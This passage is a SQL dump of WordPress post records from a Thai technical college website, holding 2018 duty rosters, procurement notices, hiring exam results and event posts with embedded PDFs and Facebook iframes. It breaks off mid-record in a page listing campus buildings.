(2838, 3, '2018-05-31 11:30:02', '2018-05-31 04:30:02', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%A1%E0%B8%B4%E0%B8%96%E0%B8%B8%E0%B8%99%E0%B8%B2%E0%B8%A2%E0%B8%99-2561-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนมิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '2835-revision-v1', '', '', '2018-05-31 11:30:02', '2018-05-31 04:30:02', '', 2835, 'http://www.technicrayong.ac.th/2835-revision-v1/', 0, 'revision', '', 0),
(2839, 3, '2018-05-31 11:30:14', '2018-05-31 04:30:14', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%A1%E0%B8%B4%E0%B8%96%E0%B8%B8%E0%B8%99%E0%B8%B2%E0%B8%A2%E0%B8%99-2561-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนมิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '2835-autosave-v1', '', '', '2018-05-31 11:30:14', '2018-05-31 04:30:14', '', 2835, 'http://www.technicrayong.ac.th/2835-autosave-v1/', 0, 'revision', '', 0),
(2841, 3, '2018-05-31 14:30:10', '2018-05-31 07:30:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-2-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ครุภัณฑ์การศึกษา จำนวน 2 รายการ แผนกช่างกลโรงงาน ประจำปีงบประมาณ 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%80%e0%b8%9c%e0%b8%a2%e0%b9%81%e0%b8%9e%e0%b8%a3%e0%b9%88%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94', '', '', '2018-05-31 14:30:10', '2018-05-31 07:30:10', '', 0, 'http://www.technicrayong.ac.th/?p=2841', 405, 'post', '', 0),
(2842, 3, '2018-05-31 14:29:46', '2018-05-31 07:29:46', '', 'ครุภัณฑ์ จำนวน 3 รายการ คอมพิวเตอร์ฯ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%84%e0%b8%a3%e0%b8%b8%e0%b8%a0%e0%b8%b1%e0%b8%93%e0%b8%91%e0%b9%8c-%e0%b8%88%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%99-3-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%84%e0%b8%ad', '', '', '2018-05-31 14:29:46', '2018-05-31 07:29:46', '', 2841, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ครุภัณฑ์-จำนวน-3-รายการ-คอมพิวเตอร์ฯ.pdf', 0, 'attachment', 'application/pdf', 0),
(2843, 3, '2018-05-31 14:29:50', '2018-05-31 07:29:50', '', 'ครุภัณฑ์ จำนวน 2 รายการ ช่างกล', '', 'inherit', 'closed', 'closed', '', '%e0%b8%84%e0%b8%a3%e0%b8%b8%e0%b8%a0%e0%b8%b1%e0%b8%93%e0%b8%91%e0%b9%8c-%e0%b8%88%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%99-2-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%8a%e0%b9%88', '', '', '2018-05-31 14:29:50', '2018-05-31 07:29:50', '', 2841, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ครุภัณฑ์-จำนวน-2-รายการ-ช่างกล.pdf', 0, 'attachment', 'application/pdf', 0),
(2844, 3, '2018-05-31 14:30:10', '2018-05-31 07:30:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-2-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ครุภัณฑ์การศึกษา จำนวน 2 รายการ แผนกช่างกลโรงงาน ประจำปีงบประมาณ 2561', '', 'inherit', 'closed', 'closed', '', '2841-revision-v1', '', '', '2018-05-31 14:30:10', '2018-05-31 07:30:10', '', 2841, 'http://www.technicrayong.ac.th/2841-revision-v1/', 0, 'revision', '', 0),
(2845, 3, '2018-05-31 14:30:20', '2018-05-31 07:30:20', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-2-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ครุภัณฑ์การศึกษา จำนวน 2 รายการ แผนกช่างกลโรงงาน ประจำปีงบประมาณ 2561', '', 'inherit', 'closed', 'closed', '', '2841-autosave-v1', '', '', '2018-05-31 14:30:20', '2018-05-31 07:30:20', '', 2841, 'http://www.technicrayong.ac.th/2841-autosave-v1/', 0, 'revision', '', 0),
(2846, 3, '2018-05-31 14:31:19', '2018-05-31 07:31:19', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-3-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%AF.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ครุภัณฑ์การศึกษา จำนวน 3 รายการ แผนกคอมพิวเตอร์ธุรกิจ ประจำปีงบประมาณ 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%80%e0%b8%9c%e0%b8%a2%e0%b9%81%e0%b8%9e%e0%b8%a3%e0%b9%88%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1-2', '', '', '2018-05-31 14:31:56', '2018-05-31 07:31:56', '', 0, 'http://www.technicrayong.ac.th/?p=2846', 404, 'post', '', 0),
(2847, 3, '2018-05-31 14:31:19', '2018-05-31 07:31:19', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-3-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%AF.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ครุภัณฑ์การศึกษา จำนวน 3 รายการ แผนกคอมพิวเตอร์ธุรกิจ ประจำปีงบประมาณ 2561', '', 'inherit', 'closed', 'closed', '', '2846-revision-v1', '', '', '2018-05-31 14:31:19', '2018-05-31 07:31:19', '', 2846, 'http://www.technicrayong.ac.th/2846-revision-v1/', 0, 'revision', '', 0),
(2848, 3, '2018-05-31 14:32:06', '2018-05-31 07:32:06', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-3-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%AF.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ครุภัณฑ์การศึกษา จำนวน 3 รายการ แผนกคอมพิวเตอร์ธุรกิจ ประจำปีงบประมาณ 2561', '', 'inherit', 'closed', 'closed', '', '2846-autosave-v1', '', '', '2018-05-31 14:32:06', '2018-05-31 07:32:06', '', 2846, 'http://www.technicrayong.ac.th/2846-autosave-v1/', 0, 'revision', '', 0),
(2849, 3, '2018-05-31 14:45:33', '2018-05-31 07:45:33', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D590109841365208%26id%3D100010985913485&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'นักเรียน นักศึกษาเข้าร่วมรับฟังการบรรยายจากวิทยากรของงานจราจร สภ.เมืองระยอง ภายใต้โครงการครู 5 นาที เพื่อสนองนโยบายของรัฐฯ ในการยกระดับมาตรฐานความปลอดภัยบนท้องถนน วันจันทร์ที่ 28 พฤษภาคม 2561 ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%a3%e0%b9%88', '', '', '2018-05-31 14:47:32', '2018-05-31 07:47:32', '', 0, 'http://www.technicrayong.ac.th/?p=2849', 403, 'post', '', 0),
(2850, 3, '2018-05-31 14:45:19', '2018-05-31 07:45:19', '', '33662617_590103491365843_4906639912477917184_o', '', 'inherit', 'closed', 'closed', '', '33662617_590103491365843_4906639912477917184_o', '', '', '2018-05-31 14:45:19', '2018-05-31 07:45:19', '', 2849, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/33662617_590103491365843_4906639912477917184_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2851, 3, '2018-05-31 14:45:33', '2018-05-31 07:45:33', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D590109841365208%26id%3D100010985913485&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'นักเรียน นักศึกษาเข้าร่วมรับฟังการบรรยายจากวิทยากรของงานจราจร สภ.เมืองระยอง ภายใต้โครงการครู 5 นาที เพื่อสนองนโยบายของรัฐฯ ในการยกระดับมาตรฐานความปลอดภัยบนท้องถนน วันจันทร์ที่ 28 พฤษภาคม 2561 ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2849-revision-v1', '', '', '2018-05-31 14:45:33', '2018-05-31 07:45:33', '', 2849, 'http://www.technicrayong.ac.th/2849-revision-v1/', 0, 'revision', '', 0),
(2852, 3, '2018-05-31 14:47:40', '2018-05-31 07:47:40', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D590109841365208%26id%3D100010985913485&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'นักเรียน นักศึกษาเข้าร่วมรับฟังการบรรยายจากวิทยากรของงานจราจร สภ.เมืองระยอง ภายใต้โครงการครู 5 นาที เพื่อสนองนโยบายของรัฐฯ ในการยกระดับมาตรฐานความปลอดภัยบนท้องถนน วันจันทร์ที่ 28 พฤษภาคม 2561 ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2849-autosave-v1', '', '', '2018-05-31 14:47:40', '2018-05-31 07:47:40', '', 2849, 'http://www.technicrayong.ac.th/2849-autosave-v1/', 0, 'revision', '', 0),
(2853, 3, '2018-05-31 15:14:41', '2018-05-31 08:14:41', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D590606454648880%26id%3D100010985913485&width=500\" width=\"500\" height=\"797\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'จัดการประชุมเครือข่ายผู้ปกครองนักเรียนระดับชั้น ปวช.2 เพื่อลดปัญหาการออกกลางคัน ประจำปีการศึกษา 2561 วันอังคารที่ 29 พฤษภาคม 2561 ณ ห้องประชุม ชั้น 4 อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b8%ad%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9c', '', '', '2018-05-31 15:14:41', '2018-05-31 08:14:41', '', 0, 'http://www.technicrayong.ac.th/?p=2853', 402, 'post', '', 0),
(2854, 3, '2018-05-31 15:14:16', '2018-05-31 08:14:16', '', '33994017_590602247982634_636889645078020096_o', '', 'inherit', 'closed', 'closed', '', '33994017_590602247982634_636889645078020096_o', '', '', '2018-05-31 15:14:16', '2018-05-31 08:14:16', '', 2853, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/33994017_590602247982634_636889645078020096_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2855, 3, '2018-05-31 15:14:41', '2018-05-31 08:14:41', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D590606454648880%26id%3D100010985913485&width=500\" width=\"500\" height=\"797\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'จัดการประชุมเครือข่ายผู้ปกครองนักเรียนระดับชั้น ปวช.2 เพื่อลดปัญหาการออกกลางคัน ประจำปีการศึกษา 2561 วันอังคารที่ 29 พฤษภาคม 2561 ณ ห้องประชุม ชั้น 4 อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2853-revision-v1', '', '', '2018-05-31 15:14:41', '2018-05-31 08:14:41', '', 2853, 'http://www.technicrayong.ac.th/2853-revision-v1/', 0, 'revision', '', 0),
(2856, 3, '2018-05-31 15:14:53', '2018-05-31 08:14:53', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D590606454648880%26id%3D100010985913485&width=500\" width=\"500\" height=\"797\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'จัดการประชุมเครือข่ายผู้ปกครองนักเรียนระดับชั้น ปวช.2 เพื่อลดปัญหาการออกกลางคัน ประจำปีการศึกษา 2561 วันอังคารที่ 29 พฤษภาคม 2561 ณ ห้องประชุม ชั้น 4 อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2853-autosave-v1', '', '', '2018-05-31 15:14:53', '2018-05-31 08:14:53', '', 2853, 'http://www.technicrayong.ac.th/2853-autosave-v1/', 0, 'revision', '', 0),
(2857, 3, '2018-05-31 15:52:20', '2018-05-31 08:52:20', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกลูกจ้างชั่วคราว เจ้าหน้าที่ จำนวน 2 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad-2', '', '', '2018-05-31 15:52:20', '2018-05-31 08:52:20', '', 0, 'http://www.technicrayong.ac.th/?p=2857', 401, 'post', '', 0),
(2858, 3, '2018-05-31 15:44:29', '2018-05-31 08:44:29', '', 'ประกาศผลสอบเจ้าหน้าที่', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b9%80%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b8%97%e0%b8%b5%e0%b9%88', '', '', '2018-05-31 15:44:29', '2018-05-31 08:44:29', '', 2857, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ประกาศผลสอบเจ้าหน้าที่.pdf', 0, 'attachment', 'application/pdf', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2859, 3, '2018-05-31 15:44:34', '2018-05-31 08:44:34', '', 'ประกาศผลสอบครูอัตราจ้าง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2', '', '', '2018-05-31 15:44:34', '2018-05-31 08:44:34', '', 2857, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ประกาศผลสอบครูอัตราจ้าง.pdf', 0, 'attachment', 'application/pdf', 0),
(2860, 3, '2018-05-31 15:52:20', '2018-05-31 08:52:20', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกลูกจ้างชั่วคราว เจ้าหน้าที่ จำนวน 2 อัตรา', '', 'inherit', 'closed', 'closed', '', '2857-revision-v1', '', '', '2018-05-31 15:52:20', '2018-05-31 08:52:20', '', 2857, 'http://www.technicrayong.ac.th/2857-revision-v1/', 0, 'revision', '', 0),
(2861, 3, '2018-05-31 15:52:30', '2018-05-31 08:52:30', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกลูกจ้างชั่วคราว เจ้าหน้าที่ จำนวน 2 อัตรา', '', 'inherit', 'closed', 'closed', '', '2857-autosave-v1', '', '', '2018-05-31 15:52:30', '2018-05-31 08:52:30', '', 2857, 'http://www.technicrayong.ac.th/2857-autosave-v1/', 0, 'revision', '', 0),
(2862, 3, '2018-05-31 15:56:50', '2018-05-31 08:56:50', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกลูกจ้างชั่วคราว ครูอัตราจ้าง จำนวน 6 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad-3', '', '', '2018-05-31 15:56:50', '2018-05-31 08:56:50', '', 0, 'http://www.technicrayong.ac.th/?p=2862', 400, 'post', '', 0),
(2863, 3, '2018-05-31 15:56:50', '2018-05-31 08:56:50', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกลูกจ้างชั่วคราว ครูอัตราจ้าง จำนวน 6 อัตรา', '', 'inherit', 'closed', 'closed', '', '2862-revision-v1', '', '', '2018-05-31 15:56:50', '2018-05-31 08:56:50', '', 2862, 'http://www.technicrayong.ac.th/2862-revision-v1/', 0, 'revision', '', 0),
(2864, 3, '2018-05-31 15:56:57', '2018-05-31 08:56:57', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกลูกจ้างชั่วคราว ครูอัตราจ้าง จำนวน 6 อัตรา', '', 'inherit', 'closed', 'closed', '', '2862-autosave-v1', '', '', '2018-05-31 15:56:57', '2018-05-31 08:56:57', '', 2862, 'http://www.technicrayong.ac.th/2862-autosave-v1/', 0, 'revision', '', 0),
(2866, 3, '2018-06-01 11:20:09', '2018-06-01 04:20:09', '', '555555', '', 'inherit', 'closed', 'closed', '', '555555', '', '', '2018-06-01 11:20:09', '2018-06-01 04:20:09', '', 2809, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/555555.jpg', 0, 'attachment', 'image/jpeg', 0),
(2867, 3, '2018-06-01 11:21:31', '2018-06-01 04:21:31', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"wp-image-2866 alignleft\" src=\"/wp-content/uploads/2018/06/555555.jpg\" alt=\"\" width=\"2000\" height=\"967\" />\r\n\r\n<img class=\"wp-image-2824 size-full alignleft\" src=\"/wp-content/uploads/2018/05/42566265256526.jpg\" alt=\"\" width=\"540\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #ffffff;\">1. อาคารโรงยิม</span></h2>\r\n<h2></h2>\r\n<h2><span style=\"color: #800000;\">1. อาคารโรงยิม</span></h2>\r\n<h2><span style=\"color: #800000;\">2. อาคารคหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">3. อาคารการท่องเที่ยว</span></h2>\r\n<h2><span style=\"color: #800000;\">4. อาคารสารสนเทศ</span></h2>\r\n<h2><span style=\"color: #800000;\">5. อาคารช่างเชื่อมเก่า</span></h2>\r\n<h2><span style=\"color: #800000;\">6. อาคารอิเล็กทรอนิกส์</span></h2>\r\n<h2><span style=\"color: #800000;\">7. อาคารบริหารธุรกิจ</span></h2>\r\n<h2><span style=\"color: #800000;\">8. อาคารปิโตรเคมี</span></h2>\r\n<h2><span style=\"color: #800000;\">9. อาคารโรงอาหาร</span></h2>\r\n<h2><span style=\"color: #800000;\">10. อาคารเรียนเขียนแบบ 2 ชั้น</span></h2>\r\n<h2><span style=\"color: #800000;\">11. อาคารช่างก่อสร้าง</span></h2>\r\n<h2><span style=\"color: #800000;\">12. อาคารตึกอำนวยการ</span></h2>\r\n<h2><span style=\"color: #800000;\">13. อาคาร AUA</span></h2>\r\n<h2><span style=\"color: #800000;\">14. อาคารพัสดุ</span></h2>\r\n<h2><span style=\"color: #800000;\">15. อาคารเขียนแบบเทคนิคพื้นฐาน</span></h2>\r\n<h2><span style=\"color: #800000;\">16. อาคารเรียนสามัญ</span></h2>\r\n<h2><span style=\"color: #800000;\">17. อาคารไฟฟ้ากำลัง</span></h2>\r\n<h2><span style=\"color: #800000;\">18. อาคารเทคโนโลยีอุตสาหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">19. อาคารช่างยนต์</span></h2>\r\n<h2><span style=\"color: #800000;\">20. 